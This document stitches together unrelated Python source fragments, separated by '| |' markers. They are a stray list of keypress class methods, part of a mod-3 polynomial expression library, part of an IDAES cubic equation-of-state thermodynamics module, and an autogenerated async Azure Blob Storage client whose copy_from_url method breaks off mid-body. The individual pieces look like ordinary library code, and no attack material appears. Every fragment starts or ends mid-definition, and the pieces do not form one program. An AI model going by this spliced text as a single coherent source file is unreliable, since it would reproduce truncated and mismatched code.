-readkey(self)
-class UnixKeyPress
-__init__(self)
-__call__(self)
-class WindowsKeyPress
-__init__(self)
-__call__(self)
-class KeyCodes
-Defined constants (under this class) for all latin1 unicode characters
-CombinationCharacters dictionary for special keyboard functions that cannot be represented as a | |
= 'mod3max'
elif self._function_name == 'MIN':
func_name = 'mod3min'
elif self._function_name == 'CONT':
func_name = 'mod3continuity'
elif self._function_name == 'NOT':
func_name = 'mod3not'
else:
raise Exception("Unknown binary relation: " + self._function_name)
return func_name + '(' + ",".join(c_exprs) + ')'
def as_polynomial(self):
expressions_as_polynomials = [mod_3(expr) if is_integer(expr)
else expr.as_polynomial()
for expr in self._expression_list]
if self._function_name == 'MAX':
assert len(expressions_as_polynomials) == 2, "wrong number of arguments for MAX"
return max3(expressions_as_polynomials[0], expressions_as_polynomials[1])
elif self._function_name == 'MIN':
assert len(expressions_as_polynomials) == 2, "wrong number of arguments for MIN"
return min3(expressions_as_polynomials[0], expressions_as_polynomials[1])
elif self._function_name == 'CONT':
assert len(expressions_as_polynomials) == 2, "wrong number of arguments for CONT"
return expressions_as_polynomials[1].continuous_polynomial_version(expressions_as_polynomials[0])
elif self._function_name == 'NOT':
assert len(expressions_as_polynomials) == 1, "wrong number of arguments for NOT"
return not3(expressions_as_polynomials[0])
else:
raise Exception("cannot evaluate unknown function " + self._function_name + " as a polynomial")
# def as_sympy(self):
#
# def cont_sympy(control, expr):
# return expr if is_integer(expr) \
# else expr.continuous_polynomial_version(control)
#
# def not_sympy(expr):
# return 1 - expr
#
# # tuples are param-count, function
# functions = {'MAX': (2, sympy.Max),
# 'MIN': (2, sympy.Min),
# 'CONT': (2, cont_sympy),
# 'NOT': (1, not_sympy)}
#
# if self._function_name not in functions:
# raise Exception("cannot evaluate unknown function " + self._function_name + " as a sympy expression")
#
# if len(self._expression_list) != functions[self._function_name][0]:
# raise Exception(f"Wrong number of arguments for {self._function_name}")
#
# function = functions[self._function_name][1]
#
# sympy_expressions = [sympy.Mod(expr, 3) if is_integer(expr)
# else sympy.Mod(expr.as_sympy(), 3)
# for expr in self._expression_list]
# return function(*sympy_expressions)
def as_numpy_str(self, variables) -> str:
np_parameter_strings = [str(expr) if is_integer(expr)
else expr.as_numpy_str(variables)
for expr in self._expression_list]
# this one is slow
# continuous_str = "( (({1})>({0})) * (({0})+1) + (({1})<({0})) * (({0})-1) + (({1})==({0}))*({0}) )"
continuous_str = "( {0}+np.sign(np.mod({1},3)-np.mod({0},3)) )"
max_str = "np.maximum(np.mod({0},3),np.mod({1},3))"
min_str = "np.minimum(np.mod({0},3),np.mod({1},3))"
not_str = "(2-({0}))"
# tuples are param-count, function
function_strings = {'MAX': (2, max_str),
'MIN': (2, min_str),
'CONT': (2, continuous_str),
'NOT': (1, not_str)}
if self._function_name not in function_strings:
raise Exception("cannot evaluate unknown function " + self._function_name + " as a numpy function")
if len(self._expression_list) != function_strings[self._function_name][0]:
raise Exception(f"Wrong number of arguments for {self._function_name}")
function = function_strings[self._function_name][1]
return function.format(*np_parameter_strings)
def get_variable_set(self):
var_set = set()
for expr in self._expression_list:
if not is_integer(expr):
var_set = var_set.union(expr.get_variable_set())
return var_set
class BinaryOperation(Expression):
def __init__(self, relation_name, left_expression: Union[Expression, int],
right_expression: Union[Expression, int]):
self.relation_name = relation_name
self._left_expression: Union[Expression, int] = left_expression
self._right_expression: Union[Expression, int] = right_expression
def rename_variables(self, name_dict: Dict[str, str]):
renamed_left_expression = rename_helper(self._left_expression, name_dict)
renamed_right_expression = rename_helper(self._right_expression, name_dict)
return BinaryOperation(self.relation_name,
left_expression=renamed_left_expression,
right_expression=renamed_right_expression)
def is_constant(self):
return (is_integer(self._left_expression) or self._left_expression.is_constant()) and \
(is_integer(self._right_expression) or self._right_expression.is_constant())
def eval(self, variable_dict):
"""
evaluate parameters, making them ints if possible
:param variable_dict: a dictionary of taking either single-term monomials or string (variable names) to ints
:return: evaluated expression
"""
evaled_left_expr = self._left_expression if is_integer(self._left_expression) \
else self._left_expression.eval(variable_dict)
evaled_left_expr = int(evaled_left_expr) \
if is_integer(evaled_left_expr) or evaled_left_expr.is_constant() \
else evaled_left_expr
evaled_right_expr = self._right_expression if is_integer(self._right_expression) \
else self._right_expression.eval(variable_dict)
evaled_right_expr = int(evaled_right_expr) \
if is_integer(evaled_right_expr) or evaled_right_expr.is_constant() \
else evaled_right_expr
if self.relation_name == 'PLUS':
return evaled_left_expr + evaled_right_expr
elif self.relation_name == 'MINUS':
return evaled_left_expr - evaled_right_expr
elif self.relation_name == 'TIMES':
return evaled_left_expr * evaled_right_expr
elif self.relation_name == 'EXP':
return evaled_left_expr ** evaled_right_expr
else:
raise Exception("cannot evaluate unknown binary op: " + self.relation_name)
def __str__(self):
short_relation_name = "?"
if self.relation_name == 'PLUS':
short_relation_name = '+'
elif self.relation_name == 'MINUS':
short_relation_name = '-'
elif self.relation_name == 'TIMES':
short_relation_name = '*'
elif self.relation_name == 'EXP':
short_relation_name = '^'
left_side = str(self._left_expression)
if isinstance(self._left_expression, BinaryOperation):
left_side = "(" + left_side + ")"
right_side = str(self._right_expression)
if isinstance(self._right_expression, BinaryOperation):
right_side = "(" + right_side + ")"
return left_side + short_relation_name + right_side
__repr__ = __str__
def as_c_expression(self):
if is_integer(self._left_expression):
left_c_expr = str(self._left_expression)
else:
left_c_expr = self._left_expression.as_c_expression()
if is_integer(self._right_expression):
right_c_expr = str(self._right_expression)
else:
right_c_expr = self._right_expression.as_c_expression()
if self.relation_name == 'PLUS':
return '(' + left_c_expr + ')+(' + right_c_expr + ')'
elif self.relation_name == 'MINUS':
return '(' + left_c_expr + ')-(' + right_c_expr + ')'
elif self.relation_name == 'TIMES':
return '(' + left_c_expr + ')*(' + right_c_expr + ')'
elif self.relation_name == 'EXP':
return 'mod3pow(' + left_c_expr + ',' + right_c_expr + ')'
else:
raise Exception("Unknown binary relation: " + self.relation_name)
def as_polynomial(self):
if is_integer(self._left_expression):
left_poly = self._left_expression
else:
left_poly = self._left_expression.as_polynomial()
if is_integer(self._right_expression):
right_poly = self._right_expression
else:
right_poly = self._right_expression.as_polynomial()
if self.relation_name == 'PLUS':
return left_poly + right_poly
elif self.relation_name == 'MINUS':
return left_poly - right_poly
elif self.relation_name == 'TIMES':
return left_poly * right_poly
elif self.relation_name == 'EXP':
# simplify the exponent = 0, 1 cases
if is_integer(right_poly):
if right_poly == 0:
return 1
elif right_poly == 1:
return left_poly
else:
return left_poly ** right_poly
else:
return left_poly ** right_poly
else:
raise Exception("Unknown binary relation: " + self.relation_name)
# def as_sympy(self):
# """
# Convert to sympy expression
# Returns
# -------
# sympy expression
# """
#
# def simple_pow(left_exp, right_exp):
# # simplify the exponent = 0, 1 cases
# if is_integer(right_exp):
# if right_exp == 0:
# return 1
# elif right_exp == 1:
# return left_exp
# else:
# return left_exp ** right_exp
# else:
# return left_exp ** right_exp
#
# relations = {'PLUS': operator.add,
# 'MINUS': operator.sub,
# 'TIMES': operator.mul,
# 'EXP': simple_pow}
#
# if self.relation_name not in relations:
# raise Exception("Unknown binary relation: " + self.relation_name)
#
# lhs = self._left_expression if is_integer(self._left_expression) else self._left_expression.as_sympy()
# rhs = self._right_expression if is_integer(self._right_expression) else self._right_expression.as_sympy()
#
# return relations[self.relation_name](lhs, rhs)
def as_numpy_str(self, variables) -> str:
"""
Convert to numpy function
Parameters
----------
variables
Returns
-------
str version of numpy function
"""
relations = {'PLUS': "(({0})+({1}))",
'MINUS': "(({0})-({1}))",
'TIMES': "(({0})*({1}))",
'EXP': "(({0})**({1}))"}
if self.relation_name not in relations:
raise Exception("Unknown binary relation: " + self.relation_name)
lhs = str(self._left_expression) if is_integer(self._left_expression) \
else self._left_expression.as_numpy_str(variables)
rhs = str(self._right_expression) if is_integer(self._right_expression) \
else self._right_expression.as_numpy_str(variables)
return relations[self.relation_name].format(lhs, rhs)
def get_variable_set(self):
var_set = set()
if not is_integer(self._left_expression):
var_set = var_set.union(self._left_expression.get_variable_set())
if not is_integer(self._right_expression):
var_set = var_set.union(self._right_expression.get_variable_set())
return var_set
class UnaryRelation(Expression):
def __init__(self, relation_name, expr):
self._relation_name = relation_name
self._expr = expr
def rename_variables(self, name_dict: Dict[str, str]):
return UnaryRelation(relation_name=self._relation_name,
expr=rename_helper(self._expr, name_dict))
def is_constant(self):
return self._expr.is_constant()
def eval(self, variable_dict):
if self._relation_name == 'MINUS':
if is_integer(self._expr):
return (-1) * self._expr
elif type(self._expr) == Expression:
evaluated_subexpression = self._expr.eval(variable_dict)
if is_integer(evaluated_subexpression) or evaluated_subexpression.is_constant():
return (-1) * int(evaluated_subexpression)
else:
return (-1) * evaluated_subexpression
else:
raise Exception("UnaryRelation in bad state with unknown unary relation name")
def __str__(self) -> str:
short_rel_name = str(self._relation_name)
if self._relation_name == 'MINUS':
short_rel_name = '-'
return short_rel_name + (
"(" + str(self._expr) + ")" if type(self._expr) == BinaryOperation else str(self._expr))
__repr__ = __str__
def as_c_expression(self):
if is_integer(self._expr):
c_exp = str(mod_3(self._expr))
else:
c_exp = self._expr.as_c_expression()
if self._relation_name == 'MINUS':
return '-(' + c_exp + ')'
else:
raise Exception("Unknown binary relation: " + self._relation_name)
def as_polynomial(self):
if is_integer(self._expr) or self._expr.is_constant():
poly = mod_3(int(self._expr))
else:
poly = self._expr.as_polynomial()
if self._relation_name == 'MINUS':
return (-1) * poly
else:
raise Exception("Unknown unary relation: " + self._relation_name)
def as_sympy(self):
"""
Convert to sympy expression
Returns
-------
sympy expression
"""
relations = {'MINUS': operator.neg}
if self._relation_name not in relations:
raise Exception("Unknown unary relation: " + self._relation_name)
expr = self._expr if is_integer(self._expr) else self._expr.as_sympy()
return relations[self._relation_name](expr)
def as_numpy_str(self, variables):
"""
Convert to numpy function
Parameters
----------
variables
Returns
-------
str numpy-representation
"""
relations = {'MINUS': "(-({0}))"}
if self._relation_name not in relations:
raise Exception("Unknown unary relation: " + self._relation_name)
expr_str = str(self._expr) if is_integer(self._expr) \
else self._expr.as_numpy_str(variables)
return relations[self._relation_name].format(expr_str)
def get_variable_set(self):
if is_integer(self._expr):
return set()
else:
return self._expr.get_variable_set()
####################################################################################################
class Monomial(Expression):
"""A class to encapsulate monomials reduced by x^3-x==0 for all variables x"""
def __init__(self, power_dict: dict):
# copy over only those terms which actually appear
self._power_dict = {str(var): power_dict[var] for var in power_dict if power_dict[var] != 0}
for var in self._power_dict.keys():
# while self._power_dict[var] < 0:
# self._power_dict[var] += 2 <--- replace with below
assert self._power_dict[var] > 0 # b/c x^-1 isn't exactly x (i.e. when x=0)
# while | |
"_a_eq")
am = getattr(m, "_" + cname + "_am_eq")
kappa = getattr(m.params, cname + "_kappa")
return (
2
* sqrt(a[p1, p2, i])
/ am[p1, p2, p3]
* sum(
m.mole_frac_phase_comp[p3, j]
* sqrt(a[p1, p2, j])
* (1 - kappa[i, j])
for j in m.components_in_phase(p3)
)
)
b.add_component(
"_" + cname + "_delta_eq",
Expression(
b.params._pe_pairs, b.phase_component_set, rule=rule_delta_eq
),
)
@staticmethod
def calculate_scaling_factors(b, pobj):
pass
@staticmethod
def build_parameters(b):
param_block = b.parent_block()
if not (b.is_vapor_phase() or b.is_liquid_phase()):
raise PropertyNotSupportedError(
"{} received unrecognized phase "
"name {}. Cubic equation of state supports only Vap and Liq "
"phases.".format(param_block.name, b)
)
if b.config.equation_of_state_options["type"] not in set(
item for item in CubicType
):
raise ConfigurationError(
"{} Unrecognized option for equation of "
"state type: {}. Must be an instance of CubicType "
"Enum.".format(b.name, b.config.equation_of_state_options["type"])
)
ctype = b.config.equation_of_state_options["type"]
b._cubic_type = ctype
cname = ctype.name
# Check to see if ConfigBlock was created by previous phase
if hasattr(param_block, cname + "_eos_options"):
ConfigBlock = getattr(param_block, cname + "_eos_options")
for key, value in b.config.equation_of_state_options.items():
if ConfigBlock[key] != value:
raise ConfigurationError(
"In {}, different {} equation of "
"state options for {} are set in different phases, which is "
"not supported.".format(b.name, cname, key)
)
# Once the options have been validated, we don't have anything
# left to do
mixing_rule_a = ConfigBlock["mixing_rule_a"]
mixing_rule_b = ConfigBlock["mixing_rule_b"]
b._mixing_rule_a = mixing_rule_a
b._mixing_rule_b = mixing_rule_b
return
setattr(param_block, cname + "_eos_options", deepcopy(CubicConfig))
ConfigBlock = getattr(param_block, cname + "_eos_options")
ConfigBlock.set_value(b.config.equation_of_state_options)
mixing_rule_a = ConfigBlock["mixing_rule_a"]
mixing_rule_b = ConfigBlock["mixing_rule_b"]
b._mixing_rule_a = mixing_rule_a
b._mixing_rule_b = mixing_rule_b
kappa_data = param_block.config.parameter_data[cname + "_kappa"]
param_block.add_component(
cname + "_kappa",
Var(
param_block.component_list,
param_block.component_list,
within=Reals,
initialize=kappa_data,
doc=cname + " binary interaction parameters",
units=None,
),
)
if b._cubic_type == CubicType.PR:
func_fw = func_fw_PR
elif b._cubic_type == CubicType.SRK:
func_fw = func_fw_SRK
else:
raise BurntToast(
"{} received unrecognized cubic type. This should "
"never happen, so please contact the IDAES developers "
"with this bug.".format(b.name)
)
setattr(param_block, cname + "_func_fw", func_fw)
setattr(param_block, cname + "_func_alpha", func_alpha_soave)
setattr(param_block, cname + "_func_dalpha_dT", func_dalpha_dT_soave)
setattr(param_block, cname + "_func_d2alpha_dT2", func_d2alpha_dT2_soave)
@staticmethod
def compress_fact_phase(b, p):
pobj = b.params.get_phase(p)
cname = pobj._cubic_type.name
A = getattr(b, cname + "_A")
B = getattr(b, cname + "_B")
expr_write = CubicThermoExpressions(b)
if pobj.is_vapor_phase():
return expr_write.z_vap(eos=pobj._cubic_type, A=A[p], B=B[p])
elif pobj.is_liquid_phase():
return expr_write.z_liq(eos=pobj._cubic_type, A=A[p], B=B[p])
raise BurntToast(
"{} non-vapor or liquid phase called for cubic "
"EoS compressability factor. This should never "
"happen, so please contact the IDAES developers "
"with this bug.".format(b.name)
)
@staticmethod
def cp_mol_phase(blk, p):
pobj = blk.params.get_phase(p)
cname = pobj._cubic_type.name
am = getattr(blk, cname + "_am")[p]
bm = getattr(blk, cname + "_bm")[p]
B = getattr(blk, cname + "_B")[p]
dam_dT = getattr(blk, cname + "_dam_dT")[p]
d2am_dT2 = getattr(blk, cname + "_d2am_dT2")[p]
T = blk.temperature
R = Cubic.gas_constant(blk)
Z = blk.compress_fact_phase[p]
dZdT = _dZ_dT(blk, p)
EoS_u = EoS_param[pobj._cubic_type]["u"]
EoS_w = EoS_param[pobj._cubic_type]["w"]
EoS_p = sqrt(EoS_u**2 - 4 * EoS_w)
expression1 = 2 * Z + (EoS_u + EoS_p) * B
expression2 = 2 * Z + (EoS_u - EoS_p) * B
expression3 = B * (dZdT + Z / T) / (Z**2 + Z * EoS_u * B + EoS_w * B**2)
cp_ideal_gas = sum(
blk.mole_frac_phase_comp[p, j]
* get_method(blk, "cp_mol_ig_comp", j)(blk, cobj(blk, j), T)
for j in blk.components_in_phase(p)
)
# Derived from the relations in Chapter 6 of [1]
cp_departure = (
R * (T * dZdT + Z - 1)
+ (T * d2am_dT2 / (EoS_p * bm))
* safe_log(expression1 / expression2, eps=eps_SL)
+ ((am - T * dam_dT) * expression3 / bm)
)
return cp_ideal_gas + cp_departure
@staticmethod
def cv_mol_phase(blk, p):
pobj = blk.params.get_phase(p)
cname = pobj._cubic_type.name
am = getattr(blk, cname + "_am")[p]
bm = getattr(blk, cname + "_bm")[p]
cp = blk.cp_mol_phase[p]
V = 1 / blk.dens_mol_phase[p]
dam_dT = getattr(blk, cname + "_dam_dT")[p]
EoS_u = EoS_param[pobj._cubic_type]["u"]
EoS_w = EoS_param[pobj._cubic_type]["w"]
dPdV = -((Cubic.gas_constant(blk) * blk.temperature) / (V - bm) ** 2) + (
am * (2 * V + EoS_u * bm) / (V**2 + EoS_u * bm * V + EoS_w * bm**2) ** 2
)
dPdT = (Cubic.gas_constant(blk) / (V - bm)) - (
1 / (V**2 + EoS_u * bm * V + EoS_w * bm**2)
) * dam_dT
# See Chapter 6 in [1]
return cp + blk.temperature * dPdT**2 / dPdV
@staticmethod
def dens_mass_phase(b, p):
return b.dens_mol_phase[p] * b.mw_phase[p]
@staticmethod
def dens_mol_phase(b, p):
pobj = b.params.get_phase(p)
return b.pressure / (
Cubic.gas_constant(b) * b.temperature * b.compress_fact_phase[p]
)
@staticmethod
def energy_internal_mol_phase(blk, p):
pobj = blk.params.get_phase(p)
cname = pobj._cubic_type.name
am = getattr(blk, cname + "_am")[p]
bm = getattr(blk, cname + "_bm")[p]
B = getattr(blk, cname + "_B")[p]
dam_dT = getattr(blk, cname + "_dam_dT")[p]
Z = blk.compress_fact_phase[p]
EoS_u = EoS_param[pobj._cubic_type]["u"]
EoS_w = EoS_param[pobj._cubic_type]["w"]
EoS_p = sqrt(EoS_u**2 - 4 * EoS_w)
# Derived from equation on pg. 120 in Properties of Gases and Liquids
# Departure function for U is similar to H minus the RT(Z-1) term
return (
(blk.temperature * dam_dT - am)
* safe_log(
(2 * Z + B * (EoS_u + EoS_p)) / (2 * Z + B * (EoS_u - EoS_p)),
eps=eps_SL,
)
) / (bm * EoS_p) + sum(
blk.mole_frac_phase_comp[p, j]
* EoSBase.energy_internal_mol_ig_comp_pure(blk, j)
for j in blk.components_in_phase(p)
)
@staticmethod
def energy_internal_mol_phase_comp(blk, p, j):
pobj = blk.params.get_phase(p)
return (
blk.enth_mol_phase_comp[p, j] - blk.pressure * blk.vol_mol_phase_comp[p, j]
)
@staticmethod
def enth_mol_phase(blk, p):
pobj = blk.params.get_phase(p)
cname = pobj._cubic_type.name
am = getattr(blk, cname + "_am")[p]
bm = getattr(blk, cname + "_bm")[p]
B = getattr(blk, cname + "_B")[p]
dam_dT = getattr(blk, cname + "_dam_dT")[p]
Z = blk.compress_fact_phase[p]
R = Cubic.gas_constant(blk)
T = blk.temperature
EoS_u = EoS_param[pobj._cubic_type]["u"]
EoS_w = EoS_param[pobj._cubic_type]["w"]
EoS_p = sqrt(EoS_u**2 - 4 * EoS_w)
enth_ideal = sum(
blk.mole_frac_phase_comp[p, j]
* get_method(blk, "enth_mol_ig_comp", j)(blk, cobj(blk, j), blk.temperature)
for j in blk.components_in_phase(p)
)
# Derived from equation on pg. 120 in Properties of Gases and Liquids
enth_departure = R * T * (Z - 1) + (T * dam_dT - am) / (bm * EoS_p) * safe_log(
(2 * Z + B * (EoS_u + EoS_p)) / (2 * Z + B * (EoS_u - EoS_p)), eps=eps_SL
)
return enth_ideal + enth_departure
@staticmethod
def enth_mol_phase_comp(blk, p, j):
pobj = blk.params.get_phase(p)
dlogphi_j_dT = _d_log_fug_coeff_dT_phase_comp(blk, p, j)
enth_ideal_gas = get_method(blk, "enth_mol_ig_comp", j)(
blk, cobj(blk, j), blk.temperature
)
enth_departure = -Cubic.gas_constant(blk) * blk.temperature**2 * dlogphi_j_dT
return enth_ideal_gas + enth_departure
@staticmethod
def entr_mol_phase(blk, p):
pobj = blk.params.get_phase(p)
cname = pobj._cubic_type.name
bm = getattr(blk, cname + "_bm")[p]
B = getattr(blk, cname + "_B")[p]
dam_dT = getattr(blk, cname + "_dam_dT")[p]
Z = blk.compress_fact_phase[p]
EoS_u = EoS_param[pobj._cubic_type]["u"]
EoS_w = EoS_param[pobj._cubic_type]["w"]
EoS_p = sqrt(EoS_u**2 - 4 * EoS_w)
R = Cubic.gas_constant(blk)
entr_ideal_gas = -R * safe_log(
blk.pressure / blk.params.pressure_ref, eps=eps_SL
)
for j in blk.components_in_phase(p):
entr_j = get_method(blk, "entr_mol_ig_comp", j)(
blk, cobj(blk, j), blk.temperature
)
xj = blk.mole_frac_phase_comp[p, j]
log_xj = blk.log_mole_frac_phase_comp[p, j]
entr_ideal_gas += xj * (entr_j - R * log_xj)
# See pg. 102 in Properties of Gases and Liquids
# or pg. 208 of Sandler, 4th Ed.
entr_departure = R * safe_log((Z - B), eps=eps_SL) + dam_dT / (
bm * EoS_p
) * safe_log(
(2 * Z + B * (EoS_u + EoS_p)) / (2 * Z + B * (EoS_u - EoS_p)), eps=eps_SL
)
return entr_ideal_gas + entr_departure
@staticmethod
def entr_mol_phase_comp(blk, p, j):
pobj = blk.params.get_phase(p)
logphi_j = _log_fug_coeff_phase_comp(blk, p, j)
dlogphi_j_dT = _d_log_fug_coeff_dT_phase_comp(blk, p, j)
R = Cubic.gas_constant(blk)
entr_ideal_gas = get_method(blk, "entr_mol_ig_comp", j)(
blk, cobj(blk, j), blk.temperature
) - R * (
safe_log(blk.pressure / blk.params.pressure_ref, eps=eps_SL)
+ blk.log_mole_frac_phase_comp[p, j]
)
entr_departure = -R * logphi_j - R * blk.temperature * dlogphi_j_dT
return entr_ideal_gas + entr_departure
@staticmethod
def fug_phase_comp(b, p, j):
return b.mole_frac_phase_comp[p, j] * b.pressure * b.fug_coeff_phase_comp[p, j]
@staticmethod
def fug_phase_comp_eq(b, p, j, pp):
return (
b.mole_frac_phase_comp[p, j]
* b.pressure
* exp(_log_fug_coeff_phase_comp_eq(b, p, j, pp))
)
@staticmethod
def log_fug_phase_comp_eq(b, p, j, pp):
return (
b.log_mole_frac_phase_comp[p, j]
+ log(b.pressure / b.params.pressure_ref)
+ _log_fug_coeff_phase_comp_eq(b, p, j, pp)
)
@staticmethod
def | |
Referencing Containers, Blobs, and
Metadata for more information.
:type metadata: str
:param tier: Optional. Indicates the tier to be set on the blob.
Possible values include: 'P4', 'P6', 'P10', 'P15', 'P20', 'P30',
'P40', 'P50', 'P60', 'P70', 'P80', 'Hot', 'Cool', 'Archive'
:type tier: str or ~azure.storage.blob.models.AccessTierOptional
:param rehydrate_priority: Optional: Indicates the priority with which
to rehydrate an archived blob. Possible values include: 'High',
'Standard'
:type rehydrate_priority: str or
~azure.storage.blob.models.RehydratePriority
:param request_id: Provides a client-generated, opaque value with a 1
KB character limit that is recorded in the analytics logs when storage
analytics logging is enabled.
:type request_id: str
:param blob_tags_string: Optional. Used to set blob tags in various
blob operations.
:type blob_tags_string: str
:param seal_blob: Overrides the sealed state of the destination blob.
Service version 2019-12-12 and newer.
:type seal_blob: bool
:param source_modified_access_conditions: Additional parameters for
the operation
:type source_modified_access_conditions:
~azure.storage.blob.models.SourceModifiedAccessConditions
:param modified_access_conditions: Additional parameters for the
operation
:type modified_access_conditions:
~azure.storage.blob.models.ModifiedAccessConditions
:param lease_access_conditions: Additional parameters for the
operation
:type lease_access_conditions:
~azure.storage.blob.models.LeaseAccessConditions
:param callable cls: A custom type or function that will be passed the
direct response
:return: None or the result of cls(response)
:rtype: None
:raises:
:class:`StorageErrorException<azure.storage.blob.models.StorageErrorException>`
"""
error_map = kwargs.pop('error_map', None)
source_if_modified_since = None
if source_modified_access_conditions is not None:
source_if_modified_since = source_modified_access_conditions.source_if_modified_since
source_if_unmodified_since = None
if source_modified_access_conditions is not None:
source_if_unmodified_since = source_modified_access_conditions.source_if_unmodified_since
source_if_match = None
if source_modified_access_conditions is not None:
source_if_match = source_modified_access_conditions.source_if_match
source_if_none_match = None
if source_modified_access_conditions is not None:
source_if_none_match = source_modified_access_conditions.source_if_none_match
source_if_tags = None
if source_modified_access_conditions is not None:
source_if_tags = source_modified_access_conditions.source_if_tags
if_modified_since = None
if modified_access_conditions is not None:
if_modified_since = modified_access_conditions.if_modified_since
if_unmodified_since = None
if modified_access_conditions is not None:
if_unmodified_since = modified_access_conditions.if_unmodified_since
if_match = None
if modified_access_conditions is not None:
if_match = modified_access_conditions.if_match
if_none_match = None
if modified_access_conditions is not None:
if_none_match = modified_access_conditions.if_none_match
if_tags = None
if modified_access_conditions is not None:
if_tags = modified_access_conditions.if_tags
lease_id = None
if lease_access_conditions is not None:
lease_id = lease_access_conditions.lease_id
# Construct URL
url = self.start_copy_from_url.metadata['url']
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True)
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if timeout is not None:
query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
# Construct headers
header_parameters = {}
if metadata is not None:
header_parameters['x-ms-meta'] = self._serialize.header("metadata", metadata, 'str')
if tier is not None:
header_parameters['x-ms-access-tier'] = self._serialize.header("tier", tier, 'str')
if rehydrate_priority is not None:
header_parameters['x-ms-rehydrate-priority'] = self._serialize.header("rehydrate_priority", rehydrate_priority, 'str')
header_parameters['x-ms-copy-source'] = self._serialize.header("copy_source", copy_source, 'str')
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
if request_id is not None:
header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id", request_id, 'str')
if blob_tags_string is not None:
header_parameters['x-ms-tags'] = self._serialize.header("blob_tags_string", blob_tags_string, 'str')
if seal_blob is not None:
header_parameters['x-ms-seal-blob'] = self._serialize.header("seal_blob", seal_blob, 'bool')
if source_if_modified_since is not None:
header_parameters['x-ms-source-if-modified-since'] = self._serialize.header("source_if_modified_since", source_if_modified_since, 'rfc-1123')
if source_if_unmodified_since is not None:
header_parameters['x-ms-source-if-unmodified-since'] = self._serialize.header("source_if_unmodified_since", source_if_unmodified_since, 'rfc-1123')
if source_if_match is not None:
header_parameters['x-ms-source-if-match'] = self._serialize.header("source_if_match", source_if_match, 'str')
if source_if_none_match is not None:
header_parameters['x-ms-source-if-none-match'] = self._serialize.header("source_if_none_match", source_if_none_match, 'str')
if source_if_tags is not None:
header_parameters['x-ms-source-if-tags'] = self._serialize.header("source_if_tags", source_if_tags, 'str')
if if_modified_since is not None:
header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", if_modified_since, 'rfc-1123')
if if_unmodified_since is not None:
header_parameters['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", if_unmodified_since, 'rfc-1123')
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
if if_none_match is not None:
header_parameters['If-None-Match'] = self._serialize.header("if_none_match", if_none_match, 'str')
if if_tags is not None:
header_parameters['x-ms-if-tags'] = self._serialize.header("if_tags", if_tags, 'str')
if lease_id is not None:
header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", lease_id, 'str')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise models.StorageErrorException(response, self._deserialize)
if cls:
response_headers = {
'ETag': self._deserialize('str', response.headers.get('ETag')),
'Last-Modified': self._deserialize('rfc-1123', response.headers.get('Last-Modified')),
'x-ms-client-request-id': self._deserialize('str', response.headers.get('x-ms-client-request-id')),
'x-ms-request-id': self._deserialize('str', response.headers.get('x-ms-request-id')),
'x-ms-version': self._deserialize('str', response.headers.get('x-ms-version')),
'x-ms-version-id': self._deserialize('str', response.headers.get('x-ms-version-id')),
'Date': self._deserialize('rfc-1123', response.headers.get('Date')),
'x-ms-copy-id': self._deserialize('str', response.headers.get('x-ms-copy-id')),
'x-ms-copy-status': self._deserialize(models.CopyStatusType, response.headers.get('x-ms-copy-status')),
'x-ms-error-code': self._deserialize('str', response.headers.get('x-ms-error-code')),
}
return cls(response, None, response_headers)
start_copy_from_url.metadata = {'url': '/{containerName}/{blob}'}
async def copy_from_url(self, copy_source, timeout=None, metadata=None, tier=None, request_id=None, source_content_md5=None, blob_tags_string=None, source_modified_access_conditions=None, modified_access_conditions=None, lease_access_conditions=None, *, cls=None, **kwargs):
"""The Copy From URL operation copies a blob or an internet resource to a
new blob. It will not return a response until the copy is complete.
:param copy_source: Specifies the name of the source page blob
snapshot. This value is a URL of up to 2 KB in length that specifies a
page blob snapshot. The value should be URL-encoded as it would appear
in a request URI. The source blob must either be public or must be
authenticated via a shared access signature.
:type copy_source: str
:param timeout: The timeout parameter is expressed in seconds. For
more information, see <a
href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-timeouts-for-blob-service-operations">Setting
Timeouts for Blob Service Operations.</a>
:type timeout: int
:param metadata: Optional. Specifies a user-defined name-value pair
associated with the blob. If no name-value pairs are specified, the
operation will copy the metadata from the source blob or file to the
destination blob. If one or more name-value pairs are specified, the
destination blob is created with the specified metadata, and metadata
is not copied from the source blob or file. Note that beginning with
version 2009-09-19, metadata names must adhere to the naming rules for
C# identifiers. See Naming and Referencing Containers, Blobs, and
Metadata for more information.
:type metadata: str
:param tier: Optional. Indicates the tier to be set on the blob.
Possible values include: 'P4', 'P6', 'P10', 'P15', 'P20', 'P30',
'P40', 'P50', 'P60', 'P70', 'P80', 'Hot', 'Cool', 'Archive'
:type tier: str or ~azure.storage.blob.models.AccessTierOptional
:param request_id: Provides a client-generated, opaque value with a 1
KB character limit that is recorded in the analytics logs when storage
analytics logging is enabled.
:type request_id: str
:param source_content_md5: Specify the md5 calculated for the range of
bytes that must be read from the copy source.
:type source_content_md5: bytearray
:param blob_tags_string: Optional. Used to set blob tags in various
blob operations.
:type blob_tags_string: str
:param source_modified_access_conditions: Additional parameters for
the operation
:type source_modified_access_conditions:
~azure.storage.blob.models.SourceModifiedAccessConditions
:param modified_access_conditions: Additional parameters for the
operation
:type modified_access_conditions:
~azure.storage.blob.models.ModifiedAccessConditions
:param lease_access_conditions: Additional parameters for the
operation
:type lease_access_conditions:
~azure.storage.blob.models.LeaseAccessConditions
:param callable cls: A custom type or function that will be passed the
direct response
:return: None or the result of cls(response)
:rtype: None
:raises:
:class:`StorageErrorException<azure.storage.blob.models.StorageErrorException>`
"""
error_map = kwargs.pop('error_map', None)
source_if_modified_since = None
if source_modified_access_conditions is not None:
source_if_modified_since = source_modified_access_conditions.source_if_modified_since
source_if_unmodified_since = None
if source_modified_access_conditions is not None:
